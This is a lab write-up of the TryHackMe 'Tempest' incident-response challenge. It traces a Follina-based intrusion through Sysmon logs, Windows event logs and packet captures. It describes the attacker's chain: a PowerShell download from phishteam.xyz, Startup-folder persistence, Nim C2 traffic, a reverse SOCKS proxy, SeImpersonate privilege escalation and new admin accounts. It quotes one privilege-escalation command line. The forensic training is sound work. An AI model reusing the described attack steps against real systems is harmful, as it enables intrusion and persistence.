Tempest

Sysmon Log, Windows Eventlog, network packet investigation

By Ren Sie
Posted on October 8, 2024

Refer to Tempest for the challenge room on TryHackMe

Preparation - Tools and Artifacts

Toolset

  • Sysmon Logs
  • Windows Event Logs
  • Packet Capture

Endpoint Logs

To analyze Windows artefacts like Windows Event Logs and Sysmon logs, we will use the following tools:

  • EvtxEcmd
  • Timeline Explorer
  • SysmonView
  • Event Viewer

Endpoint Logs

To analyze the provided packet capture, we will use the following tools:

  • Wireshark
  • Brim

Initial Access - Malicious Document

Tempest Incident

In this incident, we will serve as an Incident Responder following an alert triaged by a SOC analyst. The analyst has confirmed that the alert is of CRITICAL severity and requires further investigation. According to the SOC analyst, the intrusion began with a malicious document. The key details from the alert are as follows:

  • The malicious document has a .doc extension.
  • The user downloaded the document via chrome.exe.
  • The document executed a chain of commands to achieve code execution.

Investigation Guide

To assist with the investigation, refer to the team's cheatsheet for this scenario:

  • Begin with the events generated by Sysmon.
  • Use EvtxEcmd, Timeline Explorer, and SysmonView to interpret Sysmon logs.
  • Follow the child processes of WinWord.exe.
  • Apply filters like ParentProcessID or ProcessID to correlate process relationships.
  • Focus on Sysmon events such as Process Creation (Event ID 1) and DNS Queries (Event ID 22) to analyze the activity from the malicious document.

Task

Before investigating with Timeline Explorer, we need to convert the Sysmon logs to a .csv file. After that, we will load the `sysmon.csv` file into Timeline Explorer.

C:\Tools\EvtxECmd> EvtxECmd.exe -f "<Path_sysmon.evtx>" --csv '<output_directory>' --csvf < output_file.csv>

Before investigating with SysmonView, we need to convert the Sysmon logs to a .xml file. To do this, double-click the `sysmon.evtx` file and select "Save All Events As" from the Action panel. After that, we will load the `sysmon.xml` file into SysmonView.

The user of this machine was compromised by a malicious document. What is the file name of the document?
In this scenario, we know that the victim downloaded the malicious file using `chrome.exe`. We can locate the malicious file using both tools.

In SysmonView, search for `chrome.exe` and open all available sessions. The file name will be listed in the summary of the events.

In Timeline Explorer, search for "chrome.exe" to find the file name in the Payload Data4 column.

What is the name of the compromised user and machine?
In SysmonView, refer to the previous screenshot to identify the username associated with the download of the malicious file in their download directory. The machine name can be found in the tree map.

In Timeline Explorer, we can find the machine name and username in the Username column.

What is the PID of the Microsoft Word process that opened the malicious document?
In SysmonView, search for `WinWord.exe` as indicated in the Investigation Guide. After loading all available sessions, look for a File Created event associated with the executable. By double-clicking it, you can retrieve more details, including the PID.

In Timeline Explorer, search for `WinWord.exe` as suggested in the Investigation Guide. The PID of the MS Word process can be found in the Payload Data1 column.

Based on Sysmon logs, what is the IPv4 address resolved by the malicious domain used in the previous question?
In SysmonView, we can observe multiple network connections made by the executable. All connections are through port 443, except for one that uses port 80.

To confirm, I checked VirusTotal, which indicated that the IP address had malicious activity.

In Timeline Explorer, we can find the suspicious IP address in the Payload Data6 column. Additionally, the executable is attempting to access phishteam.xyz, which is listed in the Payload Data4 column.

What is the base64 encoded string in the malicious payload executed by the document?
Since we have the PID that executed the malicious document, we will search for any processes created by it. To do this, look for the PPID in the Payload Data5 column.

We can find the executed command in the Executable Info column. Double-click on the cell to view the cell contents.

What is the CVE number of the exploit used by the attacker to achieve a remote code execution?
By searching for "mpsigstub.exe remote code execution" on Google, I found the article titled "Follina: Microsoft Support Diagnostic Tool RCE Vulnerability Under Active Exploitation". This article details the vulnerability, its exploitation, and the associated CVE number.

Initial Access - Stage 2 execution

Based on the initial findings, we discovered a stage 2 execution: The document successfully executed an encoded base64 command. Decoding this string reveals the exact command chain executed by the malicious document.

Investigation Guide

With these discoveries, we can refer back to the cheatsheet to continue the investigation:

  • The Autostart execution indicates explorer.exe as its parent process ID.
  • Child processes of explorer.exe within the event timeframe may be significant.
  • Process Creation (Event ID 1) and File Creation (Event ID 11) following the document execution are worth examining.

Task

The malicious execution of the payload wrote a file on the system. What is the full target path of the payload?
First, we will decode the base64 string obtained from the previous question. By copying and pasting the string into Cyberchef, we can determine the payload executed by the malicious document.

Note: The command downloads a .ZIP file and extracts its contents into the Startup folder of the Start Menu. After extraction, it deletes the ZIP file to clean up.

By analyzing the command, I noted that the startup folder is involved. By inputting the path ($app\Microsoft\Windows\Start Menu\Programs\Startup) into ChatGPT, I received the full path. I then just needed to fill in the username.

C:\Users\<Username>\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup

The implanted payload executes once the user logs into the machine. What is the executed command upon a successful login of the compromised user?
As the Investigation Guide suggested, "The Autostart execution indicates explorer.exe as its PPID." I retrieved two PIDs from explorer.exe by searching in Payload Data3 column on Timeline Explorer.

I filtered the PIDs separately in Payload Data3 column and found the processes created by PowerShell.

By double-clicking to open the cell contents, I recognized the domain phishteam[.]xyz, which we encountered in the decoded payload. This is also the executed command following a successful login of the compromised user.

Note: The command uses PowerShell to download an executable file from a URL and saves it to the “Downloads” folder in the Public directory of all users while running the PowerShell window in hidden mode. After downloading, it immediately executes the downloaded file.

Based on Sysmon logs, what is the SHA256 hash of the malicious binary downloaded for stage 2 execution?
After identifying the name of the downloaded file (first.exe), I used it as a filter in the Executable Info column to retrieve its SHA256 hash value.

The stage 2 payload downloaded establishes a connection to a c2 server. What is the domain and port used by the attacker?
SysmonView offers a clearer view of the network connections made by the malicious file. After searching for the file (first.exe) and opening the sessions, we can identify the C2 server's domain name, IP address, and port.

Initial Access - Malicious Document Traffic

Based on the collected findings, we determined that the attacker fetched the stage 2 payload remotely:

  • Identified the domain and IP invoked by the malicious document in the Sysmon logs.
  • Identified another domain and IP used by the stage 2 payload, logged from the same data source.

Investigation Guide

Since we have identified network-related artefacts, we can refer to our cheatsheet focusing on Network Log Analysis:

  • Brim and Wireshark to investigate the packet capture.
  • Look for network events related to the harvested domains and IP addresses.
  • A sample Brim filter: _path=="http" "<malicious domain>".

Data Sources:

  • Packet Capture

Task

What is the URL of the malicious payload embedded in the document?
At this stage, we know there are two malicious domains: "phishteam.xyz," executed by `WinWord.exe`, and "solvecyber.xyz," executed by `first.exe` whenever a user logs into the machine. I searched both domains since the question didn't specify which document. I found the URL embedded in the malicious `WinWord.exe` by searching for the first malicious domain, "phishteam.xyz."

By analyzing the traffic, I learned that the payload first retrieves `index.html`, then `update.zip`. This file is extracted to the startup folder, which will retrieve `first.exe` when a user logs in.

WireShark: http contains "phishteam.xyz"
Brim: _path=="http" "phishteam.xyz" | cut ts, host, uri

What is the encoding used by the attacker on the c2 connection?
I followed the HTTP stream of the packet that retrieves `index.html` from the C2 server on WireShark. By using the search term "encod," I discovered another encoded string.

The malicious c2 binary sends a payload using a parameter that contains the executed command results. What is the parameter used by the binary?
As the question mention the C2 binary (first.exe), we now search for the second malicious domain " solvecyber.xyz".

WireShark: http contains "solvecyber.xyz"

The request URI indicates a resource being requested from the server, with the portion after the ? serving as a query string. The query parameter contains a Base64-encoded value that decodes to the command "whoami - tempe st\benimart".

The malicious c2 binary connects to a specific URL to get the command to be executed. What is the URL used by the binary?
As the screenshot shows, the specific URL before the query serves as a unique identifier for a specific resource on the server, which used for accessing a particular file, or executing a command.

What is the HTTP method used by the binary?
The HTTP method can be found in the previous screenshot.

Based on the user agent, what programming language was used by the attacker to compile the binary?
We can identify the programming language by examining the user-agent of the same packet in Wireshark, as mentioned in the previous question.

Note: Nim is a statically typed language that compiles to C, and its HTTP client library facilitates making HTTP requests.

Discovery - Internal Reconnaissance

Investigation Guide

Based on the collected findings, we have discovered that the malicious binary continuously uses C2 traffic:

  • Decode the encoded string found in the network traffic.
  • Traffic includes commands and outputs executed by the attacker.

Task

To continue with the investigation, we may focus on the following information:

  • Find network and process events connecting to the malicious domain.
  • Find network events that contain an encoded command.
  • Use Brim to filter all packets containing the encoded string.
  • Look for endpoint enumeration commands since the attacker is already inside the machine.

In addition, we may refer to cheatsheet for Brim to investigate the encoded traffic, to get all HTTP requests related to the malicious C2 traffic:

Brim: _path=="http" "<replace domain>" id.resp_p==<replace port> | cut ts, host, id.resp_p, uri | sort ts

Significant Data Sources:

  • Packet Capture
  • Sysmon

The attacker was able to discover a sensitive file inside the machine of the user. What is the password discovered on the file?
While investigating the traffic between the compromised machine and the malicious domain using the filters provided in the Investigation Guide, I encountered a payload that mentioned the password instead of any sensitive file content being transferred over the network.

Brim: _path=="http" "solvecyber.xyz" id.resp_p==80 | cut ts, host, id.resp_p, uri | sort ts

Note: The attacker retrieves commands from the server to enable dynamic execution of tasks, allowing for real-time adaptability based on the target’s environment. This approach enhances evasion tactics and helps automate malicious operations, making it harder for security tools to detect and flag suspicious behavior.

The attacker then enumerated the list of listening ports inside the machine. What is the listening port that could provide a remote shell inside the machine?
As I continued decoding the query, I found a netstat output. Further research revealed that the attacker exploited the WinRM (Windows Remote Management) port. For more information, refer to "Abusing Windows Remote Management (WinRM) with Metasploit" on Rapid7.

The attacker then established a reverse socks proxy to access the internal services hosted inside the machine. What is the command executed by the attacker to establish the connection?
While browsing through the Sysmon log in Timeline Explorer, I noted that the netstat command was executed at 17:16:51. I then identified a binary that connected to the malicious IP address we noted earlier via port 8080, which is commonly used by Metasploit.

What is the SHA256 hash of the binary used by the attacker to establish the reverse socks proxy connection?
To find the binary's hash value, navigate to the Payload Data3 column in Timeline Explorer.

What is the name of the tool used by the attacker based on the SHA256 hash? Provide the answer in lowercase.
By pasting the hash value of the binary into VirusTotal, we can determine its name.

The attacker then used the harvested credentials from the machine. Based on the succeeding process after the execution of the socks proxy, what service did the attacker use to authenticate?
As the screenshot shows, the wsmprovhost.exe is executed after the reverse shell binary.

Note: wsmprovhost.exe acts as a helper process for WinRM, enabling it to execute remote management tasks and commands on a target computer. WinRM provide authentication using various methods, including NTLM, Kerberos, Basic Authentication, and CredSSP.

Privilege Escalation - Exploiting Privileges

Based on the collected findings, the attacker established a stable shell through a reverse SOCKS proxy.

Investigation Guide

With this information, we can focus on the following network and endpoint events:

  • Look for events executed after the successful execution of the reverse SOCKS proxy tool.
  • Investigate potential privilege escalation attempts, as the attacker has established persistent low-privilege access.

Significant Data Sources:

  • Packet Capture
  • Sysmon

Task

After discovering the privileges of the current user, the attacker then downloaded another binary to be used for privilege escalation. What is the name and the SHA256 hash of the binary?
From previous tasks, we know that the attacker executed `ch.exe` for a reverse connection. We will continue tracking any events created after the execution of this malicious binary. As shown in the screenshot, the attacker used PowerShell to download another binary, which is what we are looking for.

To learn it’s SHA256 hash value, we need to search for the event of that binary being executed, and correlate to Payload Data3 column.

Based on the SHA256 hash of the binary, what is the name of the tool used?
By pasting the hash value of the binary into VirusTotal, we can determine its name.

The tool exploits a specific privilege owned by the user. What is the name of the privilege?
After some researches on VirusTotal, I found this GitHub repository talking about the exploitation.

Note: SeImpersonatePrivileges refers to a type of privilege in Windows that allows a user or process to impersonate another user. This is important for security and access control, as it enables an application to perform actions on behalf of a user, with the same permissions and rights that the user has.

Then, the attacker executed the tool with another binary to establish a c2 connection. What is the name of the binary?
Referring to the screenshot that correlates the malicious binary (`spf.exe`) with its SHA256 hash value, we can see that there's a command associated with another binary.

C:\Users\benimaru\Downloads\spf.exe -c C:\ProgramData\<binary.exe>

Note: The command executes spf.exe with the -c option, configuring it to establish a reverse shell connection to an attacker’s machine. The specified binary contains additional resources or configurations needed for this operation.

The binary connects to a different port from the first c2 connection. What is the port used?
First, I noted the execution time of both binaries from the previous question.

Next, I navigated to Wireshark to check for any connections established at the time the binaries were executed. By entering the C2 server’s IP address and looking at the timestamps, I identified an additional port opened for the reverse shell connection.

Actions on Objective - Fully-owned Machine

Now that the attacker has gained administrative privileges on the machine, we should identify all persistence techniques used by the attacker. Additionally, look for unusual executions related to the malicious C2 binary used during privilege escalation.

Investigation Guide

Now, we can use our cheatsheet to investigate events following a successful privilege escalation:

  • Useful Brim filter to get all HTTP requests related to the malicious C2 traffic
  • The attacker has gained SYSTEM privileges; therefore, the user context for each malicious execution is now associated with NT AUTHORITY\SYSTEM.
  • All child events of the new malicious binary used for C2 should be examined.

Brim: _path=="http" "<replace domain>" id.resp_p==<replace port> | cut ts, host, id.resp_p, uri | sort ts

Significant Data Sources:

  • Packet Capture
  • Sysmon
  • Windows Event Logs

Task

Upon achieving SYSTEM access, the attacker then created two users. What are the account names?
To create the user on Windows, we will use `net.exe`. After adding the keyword "net" in the Executable Info column on Timeline Explorer and navigating to the timeline after 17:21:34, when the reverse shell connection was established, I found that two new users were created by `net.exe` and `net1.exe`.

Note: net.exe is a built-in Windows command-line utility that allows users to manage network resources, user accounts, and services. net1.exe is an alternative version of net.exe used primarily for compatibility in specific Windows environments or older systems.

Prior to the successful creation of the accounts, the attacker executed commands that failed in the creation attempt. What is the missing option that made the attempt fail?
I scroll up to the earlier process, found that the commands are missing one option which can be found in the previous screenshot.

Based on windows event logs, the accounts were successfully created. What is the event ID that indicates the account creation activity?
Refer to the Microsoft Documentation for details on the Event ID that indicates account creation activity.

The attacker added one of the accounts in the local administrator's group. What is the command used by the attacker?
The command can be found after the creation of the new users under the same column (Executable Info) on Timeline Explorer.

Based on windows event logs, the account was successfully added to a sensitive group. What is the event ID that indicates the addition to a sensitive local group?
Refer to the Microsoft Documentation for details on the Event ID that indicates the addition to a sensitive local group.

After the account creation, the attacker executed a technique to establish persistent administrative access. What is the command executed by the attacker to achieve this?
After continuing the investigation into the processes following the commands from previous tasks, I found the command that used the malicious binaries we had identified earlier. By analyzing the command, I learned that it was intended for persistence.

Share: X (Twitter) Facebook LinkedIn